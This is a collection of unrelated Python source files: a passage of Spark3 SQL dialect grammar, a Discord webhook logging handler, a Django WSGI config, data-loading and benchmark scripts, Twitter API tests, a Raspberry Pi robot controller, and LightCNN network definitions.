Ref("LocationGrammar", optional=True),
Ref("CommentGrammar", optional=True),
Ref("TablePropertiesGrammar", optional=True),
),
# Create AS syntax:
Sequence(
"AS",
OptionallyBracketed(Ref("SelectableGrammar")),
optional=True,
),
)
@spark3_dialect.segment()
class CreateHiveFormatTableStatementSegment(hive_dialect.get_segment("CreateTableStatementSegment")): # type: ignore
"""A `CREATE TABLE` statement using Hive format.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-create-table-hiveformat.html
"""
type = "create_table_statement"
@spark3_dialect.segment(replace=True)
class CreateViewStatementSegment(BaseSegment):
"""A `CREATE VIEW` statement.
https://spark.apache.org/docs/3.0.0/sql-ref-syntax-ddl-create-view.html#syntax
"""
type = "create_view_statement"
match_grammar = Sequence(
"CREATE",
Ref("OrReplaceGrammar", optional=True),
Ref("TemporaryGrammar", optional=True),
"VIEW",
Ref("IfNotExistsGrammar", optional=True),
Ref("TableReferenceSegment"),
# Columns and comment syntax:
Sequence(
Bracketed(
Delimited(
Sequence(
Ref("ColumnReferenceSegment"),
Ref("CommentGrammar", optional=True),
),
),
),
optional=True,
),
Ref("CommentGrammar", optional=True),
Ref("TablePropertiesGrammar", optional=True),
"AS",
Ref("SelectableGrammar"),
Ref("WithNoSchemaBindingClauseSegment", optional=True),
)
@spark3_dialect.segment()
class DropFunctionStatementSegment(BaseSegment):
"""A `DROP FUNCTION` STATEMENT.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-drop-function.html
"""
type = "drop_function_statement"
match_grammar = Sequence(
"DROP",
Ref("TemporaryGrammar", optional=True),
"FUNCTION",
Ref("IfExistsGrammar", optional=True),
Ref("FunctionNameSegment"),
)
@spark3_dialect.segment()
class MsckRepairTableStatementSegment(hive_dialect.get_segment("MsckRepairTableStatementSegment")): # type: ignore
"""A `REPAIR TABLE` statement using Hive MSCK (Metastore Check) format.
This class inherits from Hive since Spark leverages Hive format for this command and
is dependent on the Hive metastore.
https://spark.apache.org/docs/latest/sql-ref-syntax-ddl-repair-table.html
"""
type = "msck_repair_table_statement"
# Auxiliary Statements
@spark3_dialect.segment()
class AddExecutablePackage(BaseSegment):
"""A `ADD JAR` statement.
https://spark.apache.org/docs/latest/sql-ref-syntax-aux-resource-mgmt-add-jar.html
"""
type = "add_executable_package"
match_grammar = Sequence(
"ADD",
Ref("ResourceFileGrammar"),
Ref("SingleOrDoubleQuotedLiteralGrammar"),
)
@spark3_dialect.segment(replace=True)
class StatementSegment(BaseSegment):
"""Overriding StatementSegment to allow for additional segment parsing."""
match_grammar = ansi_dialect.get_segment("StatementSegment").match_grammar.copy()
parse_grammar = ansi_dialect.get_segment("StatementSegment").parse_grammar.copy(
# Segments defined in Spark3 dialect
insert=[
# Data Definition Statements
Ref("AlterDatabaseStatementSegment"),
Ref("AlterTableStatementSegment"),
Ref("AlterViewStatementSegment"),
Ref("CreateHiveFormatTableStatementSegment"),
Ref("DropFunctionStatementSegment"),
Ref("MsckRepairTableStatementSegment"),
# Auxiliary Statements
Ref("AddExecutablePackage"),
],
remove=[
Ref("TransactionStatementSegment"),
Ref("CreateSchemaStatementSegment"),
Ref("SetSchemaStatementSegment"),
Ref("CreateExtensionStatementSegment"),
Ref("CreateModelStatementSegment"),
Ref("DropModelStatementSegment"),
],
)
@spark3_dialect.segment(replace=True)
class JoinClauseSegment(BaseSegment):
"""Any number of join clauses, including the `JOIN` keyword.
https://spark.apache.org/docs/3.0.0/sql-ref-syntax-qry-select-join.html
TODO: Add NATURAL JOIN syntax.
"""
type = "join_clause"
match_grammar = Sequence(
# NB These qualifiers are optional
# TODO: Allow nested joins like:
# ....FROM S1.T1 t1 LEFT JOIN ( S2.T2 t2 JOIN S3.T3 t3 ON t2.col1=t3.col1) ON tab1.col1 = tab2.col1
OneOf(
"CROSS",
"INNER",
Sequence(
OneOf(
"FULL",
"LEFT",
"RIGHT",
),
Ref.keyword("OUTER", optional=True),
),
Sequence(
Ref.keyword("LEFT", optional=True),
"SEMI",
),
Sequence(
Ref.keyword("LEFT", optional=True),
"ANTI",
),
optional=True,
),
Ref("JoinKeywords"),
Indent,
Sequence(
Ref("FromExpressionElementSegment"),
Conditional(Dedent, indented_using_on=False),
# NB: this is optional
OneOf(
# ON clause
Ref("JoinOnConditionSegment"),
# USING clause
Sequence(
"USING",
Indent,
Bracketed(
# NB: We don't use BracketedColumnReferenceListGrammar
# here because we're just using SingleIdentifierGrammar,
# rather than ObjectReferenceSegment or ColumnReferenceSegment.
# This is a) so that we don't lint it as a reference and
# b) because the column will probably be returned anyway
# during parsing.
Delimited(
Ref("SingleIdentifierGrammar"),
ephemeral_name="UsingClauseContents",
)
),
Dedent,
),
# Unqualified joins *are* allowed. They just might not
# be a good idea.
optional=True,
),
Conditional(Indent, indented_using_on=False),
),
Dedent,
)
get_eventual_alias = ansi_dialect.get_segment(
"JoinClauseSegment"
).get_eventual_alias
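# Illustrative joins this clause is meant to parse (table and column names are examples only):
#   SELECT * FROM t1 LEFT SEMI JOIN t2 ON t1.id = t2.id
#   SELECT * FROM t1 FULL OUTER JOIN t2 USING (id)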
|
py | 1a3063674cfe6bb6c2581bacbbe4161e01ec982e | """A logging handler that emits to a Discord webhook."""
import requests
from logging import Handler
class DiscordHandler(Handler):
"""A logging handler that emits to a Discord webhook."""
def __init__(self, webhook, *args, **kwargs):
"""Initialize the DiscordHandler class."""
super().__init__(*args, **kwargs)
self.webhook = webhook
def emit(self, record):
"""Emit record to the Discord webhook."""
json = {"content": self.format(record)}
try:
requests.post(self.webhook, json=json)
except requests.RequestException:
self.handleError(record)
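# Minimal usage sketch (the webhook URL is a placeholder, not a real endpoint):
#   import logging
#   handler = DiscordHandler("https://discord.com/api/webhooks/<id>/<token>")
#   handler.setFormatter(logging.Formatter("%(levelname)s: %(message)s"))
#   logging.getLogger("my_app").addHandler(handler)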
|
py | 1a306439e1e21796c88bf2b1c2a129203d4a3ca3 | """
WSGI config for pithyquotes project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'pithyquotes.settings')
application = get_wsgi_application()
|
py | 1a3064c7f1f7f412193da4007d0f5810f165c1e5 | """ Class to initialize common objects. """
import pickle
from pathlib import Path
################################################################
class Init():
#---------------------------------------------------------------
# Constructor
#---------------------------------------------------------------
def __init__(self, workdir, **kwargs):
print('Init class created.')
self.workdir = Path(workdir)
self.cachedir = self.workdir / 'cache'
print('workdir: {}'.format(self.workdir))
print('cachedir: {}'.format(self.cachedir))
#---------------------------------------------------------------
# Initialize settings as class members of obj
#---------------------------------------------------------------
def Initialize(self, obj):
obj.workdir = self.workdir
obj.cachedir = self.cachedir
obj.cachedir.mkdir(parents=True, exist_ok=True)
obj.AllData = pickle.load((obj.workdir / 'default.p').open('rb'))
#: Sets the collision systems for the entire project,
#: where each system is a string of the form
#: ``'<projectile 1><projectile 2><beam energy in GeV>'``,
#: such as ``'PbPb2760'``, ``'AuAu200'``, ``'pPb5020'``.
#: Even if the project uses only a single system,
#: this should still be a list of one system string.
obj.systems = obj.AllData["systems"]
#: Design attribute. This is a list of
#: strings describing the inputs.
#: The default is for the example data.
obj.keys = obj.AllData["keys"]
#: Design attribute. This is a list of input
#: labels in LaTeX for plotting.
#: The default is for the example data.
obj.labels = obj.AllData["labels"]
        #: Design attribute. This is a list of tuples of
#: (min,max) for each design input.
#: The default is for the example data.
obj.ranges = obj.AllData["ranges"]
#: Design array to use - should be a numpy array.
        #: Keep at None to generate a Latin Hypercube within the (specified) range above.
#: Design array for example is commented under default.
obj.design_array = obj.AllData["design"]
#: Dictionary of the model output.
#: Form MUST be data_list[system][observable][subobservable][{'Y': ,'x': }].
#: 'Y' is an (n x p) numpy array of the output.
#:
#: 'x' is a (1 x p) numpy array of numeric index of columns of Y (if exists). In the example data, x is p_T.
#: This MUST be changed from None - no built-in default exists. Uncomment the line below default for example.
obj.data_list = obj.AllData["model"]
#: Dictionary for the model validation output
        #: Must be the same form as the model output dictionary
#data_list_val = pickle.load((cachedir / 'model/validation/data_dict_val.p').open('rb'))
obj.data_list_val = None
#: Dictionary of the experimental data.
#: Form MUST be exp_data_list[system][observable][subobservable][{'y':,'x':,'yerr':{'stat':,'sys'}}].
#: 'y' is a (1 x p) numpy array of experimental data.
#:
#: 'x' is a (1 x p) numpy array of numeric index of columns of Y (if exists). In the example data, x is p_T.
#:
#: 'yerr' is a dictionary with keys 'stat' and 'sys'.
#:
#: 'stat' is a (1 x p) array of statistical errors.
#:
#: 'sys' is a (1 x p) array of systematic errors.
#: This MUST be changed from None - no built-in default exists. Uncomment the line below default for example.
obj.exp_data_list = obj.AllData["data"]
#: Experimental covariance matrix.
#: Set exp_cov = None to have the script estimate the covariance matrix.
#: Example commented below default.
obj.exp_cov = obj.AllData["cov"]
#: Observables to emulate as a list of 2-tuples
#: ``(obs, [list of subobs])``.
obj.observables = obj.AllData["observables"]
#---------------------------------------------------------------
# Initialize settings as class members of obj
#---------------------------------------------------------------
def systems(self):
AllData = pickle.load((self.workdir / 'default.p').open('rb'))
#: Sets the collision systems for the entire project,
#: where each system is a string of the form
#: ``'<projectile 1><projectile 2><beam energy in GeV>'``,
#: such as ``'PbPb2760'``, ``'AuAu200'``, ``'pPb5020'``.
#: Even if the project uses only a single system,
#: this should still be a list of one system string.
return AllData["systems"]
#---------------------------------------------------------------
# Return formatted string of class members
#---------------------------------------------------------------
def __str__(self):
s = []
variables = self.__dict__.keys()
for v in variables:
s.append('{} = {}'.format(v, self.__dict__[v]))
return "[i] {} with \n . {}".format(self.__class__.__name__, '\n . '.join(s))
|
py | 1a30660a357a742b4906447a5ec3c5d7baf05f8c | #===============================================================================
# Copyright 2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#===============================================================================
import sys
import os
import argparse
sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))
import bench
import numpy as np
from cuml import KMeans
import warnings
from sklearn.metrics.cluster import davies_bouldin_score
warnings.filterwarnings('ignore', category=FutureWarning)
parser = argparse.ArgumentParser(description='cuML K-means benchmark')
parser.add_argument('-i', '--filei', '--fileI', '--init',
type=str, help='Initial clusters')
parser.add_argument('-t', '--tol', type=float, default=0.,
help='Absolute threshold')
parser.add_argument('--maxiter', type=int, default=100,
help='Maximum number of iterations')
parser.add_argument('--samples-per-batch', type=int, default=32768,
                    help='Maximum number of samples per batch')
parser.add_argument('--n-clusters', type=int, help='Number of clusters')
params = bench.parse_args(parser, prefix='cuml', loop_types=('fit', 'predict'))
# Load and convert generated data
X_train, X_test, _, _ = bench.load_data(params)
if params.filei == 'k-means++':
X_init = 'k-means++'
# Load initial centroids from specified path
elif params.filei is not None:
X_init = np.load(params.filei).astype(params.dtype)
params.n_clusters = X_init.shape[0]
# or choose random centroids from training data
else:
np.random.seed(params.seed)
centroids_idx = np.random.randint(0, X_train.shape[0],
size=params.n_clusters)
if hasattr(X_train, "iloc"):
X_init = X_train.iloc[centroids_idx].to_pandas().values
else:
X_init = X_train[centroids_idx]
# Workaround for cuML kmeans fail
# when second call of 'fit' method causes AttributeError
def kmeans_fit(X):
alg = KMeans(n_clusters=params.n_clusters, tol=params.tol,
max_iter=params.maxiter, init=X_init,
max_samples_per_batch=params.samples_per_batch)
alg.fit(X)
return alg
# Time fit
fit_time, kmeans = bench.measure_function_time(kmeans_fit, X_train, params=params)
train_predict = kmeans.predict(X_train)
# Time predict
predict_time, test_predict = bench.measure_function_time(kmeans.predict, X_test,
params=params)
X_train_host = bench.convert_to_numpy(X_train)
train_predict_host = bench.convert_to_numpy(train_predict)
acc_train = davies_bouldin_score(X_train_host, train_predict_host)
X_test_host = bench.convert_to_numpy(X_test)
test_predict_host = bench.convert_to_numpy(test_predict)
acc_test = davies_bouldin_score(X_test_host, test_predict_host)
bench.print_output(library='cuml', algorithm='kmeans',
stages=['training', 'prediction'], params=params,
functions=['KMeans.fit', 'KMeans.predict'],
times=[fit_time, predict_time], accuracy_type='davies_bouldin_score',
accuracies=[acc_train, acc_test], data=[X_train, X_test],
alg_instance=kmeans)
|
py | 1a306643f9ad0da5aa548ab1e69afefd9221d1cb |
from .telescope import Telescope
|
py | 1a30669c1014b48ab05ee7bc1ad54bd77277dc4b | from mcstats import mcstats
mcstats.registry.append(
mcstats.MinecraftStat(
'pot_flower',
{
'title': 'Florist',
'desc': 'Flowers potted',
'unit': 'int',
},
mcstats.StatReader(['minecraft:custom','minecraft:pot_flower'])
))
|
py | 1a3066fc013335596af9d8b9f78143f165a75b42 | import unittest
from social_apis.networks.twitter_v2 import Twitter2
from config import tw_access_token
class TestTwitter2(unittest.TestCase):
def setUp(self):
self.tweet_ids = ['1261326399320715264', '1278347468690915330']
self.api = Twitter2(access_token=tw_access_token)
def test_get_tweet(self):
self.api.get_tweet(id=self.tweet_ids[0])
def test_get_tweets(self):
self.api.get_tweets(ids=self.tweet_ids)
def test_get_compliance_jobs(self):
self.api.get_compliance_jobs(type='tweets')
def test_quota_parsing(self):
self.api.get_compliance_jobs(type='tweets')
self.assertIsNotNone(self.api.get_quota())
|
py | 1a3067196b0820719f7f46d6048545e8d5f4a48d | #! /usr/bin/env python
# Copyright (c) 2014, Dawn Robotics Ltd
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the Dawn Robotics Ltd nor the names of its contributors
# may be used to endorse or promote products derived from this software without
# specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import logging
import math
import time
import Queue
import mini_driver
import threading
#---------------------------------------------------------------------------------------------------
class RobotController:
MIN_ANGLE = 0.0
MAX_ANGLE = 180.0
CENTRE_ANGLE = (MIN_ANGLE + MAX_ANGLE)/2.0
MAX_UPDATE_TIME_DIFF = 0.25
TIME_BETWEEN_SERVO_SETTING_UPDATES = 1.0
TIME_BETWEEN_SENSOR_CONFIGURATION_UPDATES = 0.5
JOYSTICK_DEAD_ZONE = 0.1
MAX_ABS_NECK_SPEED = 30.0 # Degrees per second
    MOTION_COMMAND_TIMEOUT = 2.0        # If no commands for the motors are received in this time then
# the motors (drive and servo) are set to zero speed
#-----------------------------------------------------------------------------------------------
def __init__( self, robotConfig ):
self.miniDriver = mini_driver.MiniDriver()
connected = self.miniDriver.connect()
if not connected:
raise Exception( "Unable to connect to the mini driver" )
self.robotConfig = robotConfig
self.leftMotorSpeed = 0
self.rightMotorSpeed = 0
self.panAngle = self.CENTRE_ANGLE
self.tiltAngle = self.CENTRE_ANGLE
self.panSpeed = 0.0
self.tiltSpeed = 0.0
self.lastServoSettingsSendTime = 0.0
self.lastSensorConfigurationSendTime = 0.0
self.lastUpdateTime = 0.0
self.lastMotionCommandTime = time.time()
self.piSensorModuleName = ""
self.piSensorModule = None
self.piSensorReader = None
self.piSensorDict = {}
#-----------------------------------------------------------------------------------------------
def __del__( self ):
self.disconnect()
#-----------------------------------------------------------------------------------------------
def disconnect( self ):
self.miniDriver.disconnect()
#-----------------------------------------------------------------------------------------------
def getStatusDict( self ):
presetMaxAbsMotorSpeed, presetMaxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()
statusDict = {
"batteryVoltage" : self.miniDriver.getBatteryVoltageReading().data,
"presetMaxAbsMotorSpeed" : presetMaxAbsMotorSpeed,
"presetMaxAbsTurnSpeed" : presetMaxAbsTurnSpeed,
"sensors" : self.getSensorDict()
}
return statusDict
#-----------------------------------------------------------------------------------------------
def getSensorDict( self ):
sensorDict = {
"batteryVoltage" : self.miniDriver.getBatteryVoltageReading(),
"digital" : self.miniDriver.getDigitalReadings(),
"analog" : self.miniDriver.getAnalogReadings(),
"ultrasonic" : self.miniDriver.getUltrasonicReading(),
"encoders" : self.miniDriver.getEncodersReading(),
}
sensorDict.update( self.piSensorDict )
return sensorDict
#-----------------------------------------------------------------------------------------------
def normaliseJoystickData( self, joystickX, joystickY ):
stickVectorLength = math.sqrt( joystickX**2 + joystickY**2 )
if stickVectorLength > 1.0:
joystickX /= stickVectorLength
joystickY /= stickVectorLength
if stickVectorLength < self.JOYSTICK_DEAD_ZONE:
joystickX = 0.0
joystickY = 0.0
return ( joystickX, joystickY )
#-----------------------------------------------------------------------------------------------
def centreNeck( self ):
self.panAngle = self.CENTRE_ANGLE
self.tiltAngle = self.CENTRE_ANGLE
self.panSpeed = 0.0
self.tiltSpeed = 0.0
#-----------------------------------------------------------------------------------------------
def setMotorJoystickPos( self, joystickX, joystickY ):
joystickX, joystickY = self.normaliseJoystickData( joystickX, joystickY )
if self.robotConfig.usePresetMotorSpeeds:
maxAbsMotorSpeed, maxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()
else:
maxAbsMotorSpeed = self.robotConfig.customMaxAbsMotorSpeed
maxAbsTurnSpeed = self.robotConfig.customMaxAbsTurnSpeed
# Set forward speed from joystickY
leftMotorSpeed = maxAbsMotorSpeed*joystickY
rightMotorSpeed = maxAbsMotorSpeed*joystickY
# Set turn speed from joystickX
leftMotorSpeed += maxAbsTurnSpeed*joystickX
rightMotorSpeed -= maxAbsTurnSpeed*joystickX
leftMotorSpeed = max( -maxAbsMotorSpeed, min( leftMotorSpeed, maxAbsMotorSpeed ) )
rightMotorSpeed = max( -maxAbsMotorSpeed, min( rightMotorSpeed, maxAbsMotorSpeed ) )
self.leftMotorSpeed = leftMotorSpeed*self.robotConfig.leftMotorScale
self.rightMotorSpeed = rightMotorSpeed
self.lastMotionCommandTime = time.time()
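    # Illustrative mixing (speed values below are assumed purely as an example):
    # with maxAbsMotorSpeed=1.0 and maxAbsTurnSpeed=0.3, joystick (0.0, 1.0) gives
    # left=right=1.0 (straight ahead), while (1.0, 0.0) gives left=+0.3, right=-0.3
    # (turn on the spot), before the leftMotorScale correction is applied.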
#-----------------------------------------------------------------------------------------------
def setMotorSpeeds( self, leftMotorSpeed, rightMotorSpeed ):
if self.robotConfig.usePresetMotorSpeeds:
maxAbsMotorSpeed, maxAbsTurnSpeed = self.miniDriver.getPresetMotorSpeeds()
else:
maxAbsMotorSpeed = self.robotConfig.customMaxAbsMotorSpeed
maxAbsTurnSpeed = self.robotConfig.customMaxAbsTurnSpeed
self.leftMotorSpeed = max( -maxAbsMotorSpeed, min( leftMotorSpeed, maxAbsMotorSpeed ) )
self.rightMotorSpeed = max( -maxAbsMotorSpeed, min( rightMotorSpeed, maxAbsMotorSpeed ) )
self.lastMotionCommandTime = time.time()
#-----------------------------------------------------------------------------------------------
def setNeckJoystickPos( self, joystickX, joystickY ):
joystickX, joystickY = self.normaliseJoystickData( joystickX, joystickY )
# Set pan and tilt angle speeds
self.panSpeed = -self.MAX_ABS_NECK_SPEED*joystickX
self.tiltSpeed = -self.MAX_ABS_NECK_SPEED*joystickY
self.lastMotionCommandTime = time.time()
#-----------------------------------------------------------------------------------------------
def setNeckAngles( self, panAngle, tiltAngle ):
self.panAngle = max( self.MIN_ANGLE, min( panAngle, self.MAX_ANGLE ) )
self.tiltAngle = max( self.MIN_ANGLE, min( tiltAngle, self.MAX_ANGLE ) )
self.panSpeed = 0.0
self.tiltSpeed = 0.0
self.lastMotionCommandTime = time.time()
#-----------------------------------------------------------------------------------------------
def _loadPiSensorModule( self ):
if self.robotConfig.piSensorModuleName != "":
# Try to import the new sensor module
newSensorModule = None
try:
newSensorModule = __import__( self.robotConfig.piSensorModuleName, fromlist=[''] )
except Exception as e:
logging.error( "Caught exception when trying to import Pi sensor module" )
logging.error( str( e ) )
if newSensorModule != None:
# We have a new sensor module. Shutdown any existing sensor reader
if self.piSensorReader != None:
self.piSensorReader.shutdown()
self.piSensorReader = None
# Remove reference to existing sensor module
self.piSensorModule = None
self.piSensorModuleName = ""
# Try to create the new Pi sensor reader
newSensorReader = None
try:
newSensorReader = newSensorModule.PiSensorReader()
except Exception as e:
logging.error( "Caught exception when trying to create Pi sensor reader" )
logging.error( str( e ) )
if newSensorReader != None:
self.piSensorModule = newSensorModule
self.piSensorModuleName = self.robotConfig.piSensorModuleName
self.piSensorReader = newSensorReader
#-----------------------------------------------------------------------------------------------
def update( self ):
if not self.miniDriver.isConnected():
return
curTime = time.time()
timeDiff = min( curTime - self.lastUpdateTime, self.MAX_UPDATE_TIME_DIFF )
# Turn off the motors if we haven't received a motion command for a while
if curTime - self.lastMotionCommandTime > self.MOTION_COMMAND_TIMEOUT:
self.leftMotorSpeed = 0.0
self.rightMotorSpeed = 0.0
self.panSpeed = 0.0
self.tiltSpeed = 0.0
# Update the pan and tilt angles
self.panAngle += self.panSpeed*timeDiff
self.tiltAngle += self.tiltSpeed*timeDiff
self.panAngle = max( self.MIN_ANGLE, min( self.panAngle, self.MAX_ANGLE ) )
self.tiltAngle = max( self.MIN_ANGLE, min( self.tiltAngle, self.MAX_ANGLE ) )
# Update the mini driver
self.miniDriver.setOutputs(
self.leftMotorSpeed, self.rightMotorSpeed, self.panAngle, self.tiltAngle )
self.miniDriver.update()
# Send servo settings if needed
if curTime - self.lastServoSettingsSendTime >= self.TIME_BETWEEN_SERVO_SETTING_UPDATES:
self.miniDriver.setPanServoLimits(
self.robotConfig.panPulseWidthMin,
self.robotConfig.panPulseWidthMax )
self.miniDriver.setTiltServoLimits(
self.robotConfig.tiltPulseWidthMin,
self.robotConfig.tiltPulseWidthMax )
self.lastServoSettingsSendTime = curTime
# Send sensor configuration if needed
if curTime - self.lastSensorConfigurationSendTime >= self.TIME_BETWEEN_SENSOR_CONFIGURATION_UPDATES:
self.miniDriver.setSensorConfiguration( self.robotConfig.miniDriverSensorConfiguration )
self.lastSensorConfigurationSendTime = curTime
# Change the Pi sensor module if needed
if self.robotConfig.piSensorModuleName != self.piSensorModuleName:
self._loadPiSensorModule()
# Read from any sensors attached to the Pi
if self.piSensorReader != None:
self.piSensorDict = {}
try:
self.piSensorDict = self.piSensorReader.readSensors()
except Exception as e:
logging.error( "Caught exception when trying to read from Pi sensor reader" )
logging.error( str( e ) )
self.lastUpdateTime = curTime |
py | 1a306736302e368bcf1a6fff563146cd6babb1ea | import torch
import torch.nn as nn
import torch.nn.functional as F
class mfm(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size=3, stride=1, padding=1, type=1):
super(mfm, self).__init__()
self.out_channels = out_channels
if type == 1:
self.filter = nn.Conv2d(in_channels, 2*out_channels, kernel_size=kernel_size, stride=stride, padding=padding)
else:
self.filter = nn.Linear(in_channels, 2*out_channels)
def forward(self, x):
x = self.filter(x)
out = torch.split(x, self.out_channels, 1)
return torch.max(out[0], out[1])
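# Shape sketch for the Max-Feature-Map (MFM) unit above, with assumed example sizes:
# a (N, 1, 128, 128) input through mfm(1, 48, 5, 1, 2) is convolved to (N, 96, 128, 128),
# split into two (N, 48, 128, 128) halves along dim 1, and reduced by element-wise max
# back to (N, 48, 128, 128).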
class group(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride, padding):
super(group, self).__init__()
self.conv_a = mfm(in_channels, in_channels, 1, 1, 0)
self.conv = mfm(in_channels, out_channels, kernel_size, stride, padding)
def forward(self, x):
x = self.conv_a(x)
x = self.conv(x)
return x
class resblock(nn.Module):
def __init__(self, in_channels, out_channels):
super(resblock, self).__init__()
self.conv1 = mfm(in_channels, out_channels, kernel_size=3, stride=1, padding=1)
self.conv2 = mfm(in_channels, out_channels, kernel_size=3, stride=1, padding=1)
def forward(self, x):
res = x
out = self.conv1(x)
out = self.conv2(out)
out = out + res
return out
class network_9layers(nn.Module):
def __init__(self, num_classes=79077):
super(network_9layers, self).__init__()
self.features = nn.Sequential(
mfm(1, 48, 5, 1, 2),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(48, 96, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(96, 192, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(192, 128, 3, 1, 1),
group(128, 128, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
)
self.fc1 = mfm(8*8*128, 256, type=0)
self.fc2 = nn.Linear(256, num_classes)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.fc1(x)
x = F.dropout(x, training=self.training)
out = self.fc2(x)
return out, x
class network_29layers(nn.Module):
def __init__(self, block, layers, num_classes=79077):
super(network_29layers, self).__init__()
self.conv1 = mfm(1, 48, 5, 1, 2)
self.pool1 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)
self.block1 = self._make_layer(block, layers[0], 48, 48)
self.group1 = group(48, 96, 3, 1, 1)
self.pool2 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)
self.block2 = self._make_layer(block, layers[1], 96, 96)
self.group2 = group(96, 192, 3, 1, 1)
self.pool3 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)
self.block3 = self._make_layer(block, layers[2], 192, 192)
self.group3 = group(192, 128, 3, 1, 1)
self.block4 = self._make_layer(block, layers[3], 128, 128)
self.group4 = group(128, 128, 3, 1, 1)
self.pool4 = nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True)
self.fc = mfm(8*8*128, 256, type=0)
self.fc2 = nn.Linear(256, num_classes)
def _make_layer(self, block, num_blocks, in_channels, out_channels):
layers = []
for i in range(0, num_blocks):
layers.append(block(in_channels, out_channels))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = self.pool1(x)
x = self.block1(x)
x = self.group1(x)
x = self.pool2(x)
x = self.block2(x)
x = self.group2(x)
x = self.pool3(x)
x = self.block3(x)
x = self.group3(x)
x = self.block4(x)
x = self.group4(x)
x = self.pool4(x)
x = x.view(x.size(0), -1)
fc = self.fc(x)
fc = F.dropout(fc, training=self.training)
out = self.fc2(fc)
return out, fc
class network_29layers_v2(nn.Module):
def __init__(self, block, layers, num_classes=79077):
super(network_29layers_v2, self).__init__()
self.conv1 = mfm(1, 48, 5, 1, 2)
self.block1 = self._make_layer(block, layers[0], 48, 48)
self.group1 = group(48, 96, 3, 1, 1)
self.block2 = self._make_layer(block, layers[1], 96, 96)
self.group2 = group(96, 192, 3, 1, 1)
self.block3 = self._make_layer(block, layers[2], 192, 192)
self.group3 = group(192, 128, 3, 1, 1)
self.block4 = self._make_layer(block, layers[3], 128, 128)
self.group4 = group(128, 128, 3, 1, 1)
self.fc = nn.Linear(8*8*128, 256)
self.fc2 = nn.Linear(256, num_classes[0], bias=False)
def _make_layer(self, block, num_blocks, in_channels, out_channels):
layers = []
for i in range(0, num_blocks):
layers.append(block(in_channels, out_channels))
return nn.Sequential(*layers)
def forward(self, x):
x = self.conv1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block1(x)
x = self.group1(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block2(x)
x = self.group2(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = self.block3(x)
x = self.group3(x)
x = self.block4(x)
x = self.group4(x)
x = F.max_pool2d(x, 2) + F.avg_pool2d(x, 2)
x = x.view(x.size(0), -1)
fc = self.fc(x)
x = F.dropout(fc, training=self.training)
        # Note: self.fc_dict is never defined in __init__, so the original loop over it
        # would raise AttributeError (and .iteritems() is Python 2 only); use the single
        # fc2 head defined above while keeping the list-of-outputs return shape.
        output = [self.fc2(x)]
        return output, fc
class network_9layers_templet(nn.Module):
def __init__(self, in_channel):
super(network_9layers_templet, self).__init__()
self.features = nn.Sequential(
mfm(in_channel, 48, 5, 1, 2),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(48, 96, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(96, 192, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
group(192, 128, 3, 1, 1),
group(128, 128, 3, 1, 1),
nn.MaxPool2d(kernel_size=2, stride=2, ceil_mode=True),
)
self.fc1 = mfm(8*8*128, 256, type=0)
def forward(self, x):
x = self.features(x)
x = x.view(x.size(0), -1)
x = self.fc1(x)
out = F.dropout(x, training=self.training)
return out
